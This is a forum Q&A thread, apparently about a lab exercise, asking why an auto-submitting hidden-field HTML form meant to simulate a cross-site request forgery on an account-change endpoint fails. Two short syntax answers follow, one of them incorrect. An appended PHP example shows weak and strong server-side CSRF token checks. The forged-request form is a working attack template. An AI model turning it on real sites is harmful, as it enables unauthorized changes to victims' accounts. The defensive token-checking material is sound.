I am having trouble submitting parameters to a website via HTML code simulating an XSRF attack. I have the HTML below, in which I have set the parameters for the action, including an account #, routing #, action, and a value that I need to reverse engineer through source code that represents the user's session.

When run, the site either returns "Changes Saved" indicating a successful XSRF attack or returns "XRSF Blocked" indicating I did not derive the fourth value correctly.

However, when I log in to the site and execute the script, nothing is returned and even the page forms are unchanged. I think something in my syntax is probably slightly off. Can someone assist?

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8"/>
<title>XSRF</title>
</head>
<body onload='document.forms[0].submit();'>
<form action='some_php_file.php' method='POST'>
<input type='hidden' name='action' value='save'/>
<input type='hidden' name='account' value='3192332'/>
</form>
</body>
</html>

2 Answers

0
Community On

Your inputs have no closing tags.

<input type='hidden' name='action' value='save'
<input type='hidden' name='account' value='3192332'

0
frogman578 On

In order to post information, you need a submit input:

 <form action='some_php_file.php' method='POST'>
 <input type='hidden' name='action' value='save'/>
 <input type='hidden' name='account' value='3192332'/>
 <input type="submit" name="name" placeholder="placeholder"/>
 </form>

Hope this helps :-)
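
For the defending side of the exercise described in the question, here is an added example (not part of the original thread and not the target site's code) of the server-side check that decides between "Changes Saved" and "XSRF Blocked". The `csrf` field name, the function names and the `md5` derivation used for the weak case are assumptions made for illustration.

```php
<?php
// Added example; every name here is hypothetical. $session stands in for
// $_SESSION so the script runs from the PHP command line without a web server.

// Weak pattern: a token computed only from values visible to the client
// can be recomputed by anyone who reads the page source, so it offers no
// protection against a forged cross-site POST.
function weak_token(string $account): string
{
    return md5($account);
}

// Hardened pattern: an unpredictable per-session token generated from a
// CSPRNG and stored server-side, then embedded in the site's own forms.
function issue_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Request handler: reject the POST unless the submitted token matches the
// one stored in the session. hash_equals() compares in constant time.
function handle_save(array $session, array $post): string
{
    $sent     = $post['csrf'] ?? '';
    $expected = $session['csrf'] ?? '';
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return 'XSRF Blocked';
    }
    // The account change would be applied here.
    return 'Changes Saved';
}

// Constructed sample requests for the demonstration.
$session = [];
$token   = issue_token($session);
$guessed = ['action' => 'save', 'account' => '3192332', 'csrf' => weak_token('3192332')];
$missing = ['action' => 'save', 'account' => '3192332'];
$genuine = ['action' => 'save', 'account' => '3192332', 'csrf' => $token];

foreach ([$guessed, $missing, $genuine] as $post) {
    echo handle_save($session, $post), "\n";
}
```

Only the request carrying the session's stored random token is accepted; a request with a token recomputed from visible form values, or with no token at all, is rejected.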